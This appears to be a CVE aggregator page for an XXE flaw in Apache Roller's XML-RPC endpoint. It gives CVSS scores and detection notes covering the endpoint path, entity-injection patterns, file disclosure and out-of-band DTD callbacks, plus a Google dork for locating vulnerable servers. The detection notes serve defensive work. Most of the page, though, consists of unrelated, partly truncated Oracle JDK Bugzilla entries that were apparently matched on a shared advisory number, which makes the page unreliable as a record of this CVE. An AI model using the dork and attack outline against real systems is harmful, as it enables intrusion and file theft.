CVE-2014-0030
published 2017-10-10CVE-2014-0030: The XML-RPC protocol support in Apache Roller before 5.0.3 allows attackers to conduct XML External Entity (XXE) attacks via unspecified vectors.
PriorityP266critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
16.87%
96.7th percentile
The XML-RPC protocol support in Apache Roller before 5.0.3 allows attackers to conduct XML External Entity (XXE) attacks via unspecified vectors.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | roller | — | — |
| apache | roller | — | — |
| apache | roller | — | — |
| apache | roller | — | — |
| apache | roller | — | — |
| apache | roller | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for unauthenticated or anomalous HTTP POST requests to the Apache Roller XML-RPC endpoint path /roller-services/xmlrpc, which is the attack delivery point for XXE payloads. ↗
- →Inspect POST body content to /roller-services/xmlrpc for XML DOCTYPE declarations containing ENTITY definitions (e.g., &xxe; or %dtd; references), which are characteristic of XXE injection attempts. ↗
- →Detect outbound HTTP callbacks from the server to attacker-controlled hosts triggered during XML parsing — indicative of the advanced out-of-band XXE variant used by this exploit. ↗
- →Use the Google dork to identify exposed vulnerable Apache Roller instances: intext:"apache roller weblogger version {vulnerable_version_number}" ↗
- ·The vulnerability affects Apache Roller versions before 5.0.3; the exploit script targets the XML-RPC protocol support. Ensure the endpoint /roller-services/xmlrpc is disabled or access-controlled if upgrading is not immediately possible. ↗
- ·The exploit has two modes: a simple in-band file disclosure mode (reading files like /etc/passwd directly in the XML-RPC fault response) and an advanced out-of-band mode using an attacker-hosted DTD server, requiring detection coverage for both patterns. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Bugzilla
CVE-2013-5904 Oracle JDK: unspecified vulnerability fixed in 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 6.8
CVE-2013-5904 [MEDIUM] CVE-2013-5904 Oracle JDK: unspecified vulnerability fixed in 7u51 (Deployment)
CVE-2013-5904 Oracle JDK: unspecified vulnerability fixed in 7u51 (Deployment)
Oracle Java SE 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5904). Upstream has CVSSv2 scored this issue as: 6.8/AV:N/AC:M/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
Bugzilla
CVE-2014-0418 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 5.1
CVE-2014-0418 [MEDIUM] CVE-2014-0418 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2014-0418 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0418). Upstream has CVSSv2 scored this issue as: 5.1/AV:N/AC:H/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Oracle Java for Red Hat Enterprise Linux 6
Oracle Java for Red Hat Enterprise Linux 5
Via RHSA-2014:0414 https://rhn.redhat.com/err
Bugzilla
CVE-2013-5906 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)
bugzilla·2014-01-15·CVSS 5.1
CVE-2013-5906 [MEDIUM] CVE-2013-5906 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)
CVE-2013-5906 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)
Oracle Java SE 5.0u71, 6u71 and 7u51 fixes an unspecified vulnerability in the Install component (CVE-2013-5906). Upstream has CVSSv2 scored this issue as: 5.1/AV:N/AC:H/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Oracle Java for Red Hat Enterprise Linux 6
Oracle Java for Red Hat Enterprise Linux 5
Via RHSA-2014:0414 https://rhn.redh
Bugzilla
CVE-2013-5889 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 9.3
CVE-2013-5889 [CRITICAL] CVE-2013-5889 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2013-5889 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5889). Upstream has CVSSv2 scored this issue as: 9.3/AV:N/AC:M/Au:N/C:C/I:C/A:C
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2014-0415 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 10.0
CVE-2014-0415 [CRITICAL] CVE-2014-0415 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2014-0415 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0415). Upstream has CVSSv2 scored this issue as: 10.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.co
Bugzilla
CVE-2013-5898 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 4.0
CVE-2013-5898 [MEDIUM] CVE-2013-5898 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2013-5898 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5898). Upstream has CVSSv2 scored this issue as: 4.0/AV:N/AC:H/Au:N/C:P/I:P/A:N
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2014-0410 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 10.0
CVE-2014-0410 [CRITICAL] CVE-2014-0410 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2014-0410 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0410). Upstream has CVSSv2 scored this issue as: 10.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.co
Bugzilla
CVE-2014-0387 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 7.6
CVE-2014-0387 [HIGH] CVE-2014-0387 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2014-0387 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0387). Upstream has CVSSv2 scored this issue as: 7.6/AV:N/AC:H/Au:N/C:C/I:C/A:C
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2013-5899 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 5.0
CVE-2013-5899 [MEDIUM] CVE-2013-5899 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2013-5899 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5899). Upstream has CVSSv2 scored this issue as: 5.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2013-5905 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)
bugzilla·2014-01-15·CVSS 5.1
CVE-2013-5905 [MEDIUM] CVE-2013-5905 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)
CVE-2013-5905 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)
Oracle Java SE 5.0u71, 6u71 and 7u51 fixes an unspecified vulnerability in the Install component (CVE-2013-5905). Upstream has CVSSv2 scored this issue as: 5.1/AV:N/AC:H/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Oracle Java for Red Hat Enterprise Linux 6
Oracle Java for Red Hat Enterprise Linux 5
Via RHSA-2014:0414 https://rhn.redh
Bugzilla
CVE-2013-5887 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 5.0
CVE-2013-5887 [MEDIUM] CVE-2013-5887 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2013-5887 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5887). Upstream has CVSSv2 scored this issue as: 5.0/AV:N/AC:L/Au:N/C:N/I:N/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2014-0417 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (2D)
bugzilla·2014-01-15·CVSS 9.3
CVE-2014-0417 [CRITICAL] CVE-2014-0417 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (2D)
CVE-2014-0417 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (2D)
Oracle Java SE 5.0u71, 6u71 and 7u51 fixes an unspecified vulnerability in the 2D component (CVE-2014-0417). Upstream has CVSSv2 scored this issue as: 9.3/AV:N/AC:M/Au:N/C:C/I:C/A:C
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0136 https://rhn.redhat.com
Bugzilla
CVE-2014-0403 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 5.8
CVE-2014-0403 [MEDIUM] CVE-2014-0403 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2014-0403 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0403). Upstream has CVSSv2 scored this issue as: 5.8/AV:N/AC:M/Au:N/C:P/I:P/A:N
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2013-5902 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 5.1
CVE-2013-5902 [MEDIUM] CVE-2013-5902 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2013-5902 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5902). Upstream has CVSSv2 scored this issue as: 5.1/AV:N/AC:H/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Oracle Java for Red Hat Enterprise Linux 6
Oracle Java for Red Hat Enterprise Linux 5
Via RHSA-2014:0414 https://rhn.redhat.com/err
Bugzilla
CVE-2013-5870 CVE-2013-5895 CVE-2014-0382 Oracle JDK: multiple unspecified vulnerabilities fixed in 7u51 (JavaFX)
bugzilla·2014-01-15·CVSS 6.8
CVE-2013-5870 [MEDIUM] CVE-2013-5870 CVE-2013-5895 CVE-2014-0382 Oracle JDK: multiple unspecified vulnerabilities fixed in 7u51 (JavaFX)
CVE-2013-5870 CVE-2013-5895 CVE-2014-0382 Oracle JDK: multiple unspecified vulnerabilities fixed in 7u51 (JavaFX)
Oracle Java SE 7u51 fixes multiple unspecified vulnerabilities in the JavaFX component. Upstream has CVSSv2 scored these issues as:
CVE-2013-5870 6.8/AV:N/AC:M/Au:N/C:P/I:P/A:P
CVE-2013-5895 5.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
CVE-2014-0382 4.3/AV:N/AC:M/Au:N/C:N/I:N/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
Bugzilla
CVE-2014-0375 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 5.8
CVE-2014-0375 [MEDIUM] CVE-2014-0375 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2014-0375 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0375). Upstream has CVSSv2 scored this issue as: 5.8/AV:N/AC:M/Au:N/C:P/I:P/A:N
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2014-0424 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 7.5
CVE-2014-0424 [HIGH] CVE-2014-0424 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2014-0424 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2014-0424). Upstream has CVSSv2 scored this issue as: 7.5/AV:N/AC:L/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
Bugzilla
CVE-2013-5888 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
bugzilla·2014-01-15·CVSS 4.6
CVE-2013-5888 [MEDIUM] CVE-2013-5888 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
CVE-2013-5888 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)
Oracle Java SE 6u71 and 7u51 fixes an unspecified vulnerability in the Deployment component (CVE-2013-5888). Upstream has CVSSv2 scored this issue as: 4.6/AV:L/AC:L/Au:N/C:P/I:P/A:P
External Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixJAVA
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0030 https://rhn.redhat.com/errata/RHSA-2014-0030.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Via RHSA-2014:0135 https://rhn.redhat.com
https://liftsecurity.io/advisories/Apache_Roller_XML-RPC_susceptible_to_XXE/https://mail-archives.apache.org/mod_mbox/roller-dev/201401.mbox/%3CCAF1aazCMzDGB12Ls4t-SOwNA=OdguD010LX3yZGhk2GQHafFXw%40mail.gmail.com%3Ehttps://www.exploit-db.com/exploits/45341/https://liftsecurity.io/advisories/Apache_Roller_XML-RPC_susceptible_to_XXE/https://mail-archives.apache.org/mod_mbox/roller-dev/201401.mbox/%3CCAF1aazCMzDGB12Ls4t-SOwNA=OdguD010LX3yZGhk2GQHafFXw%40mail.gmail.com%3Ehttps://www.exploit-db.com/exploits/45341/
2017-10-10
Published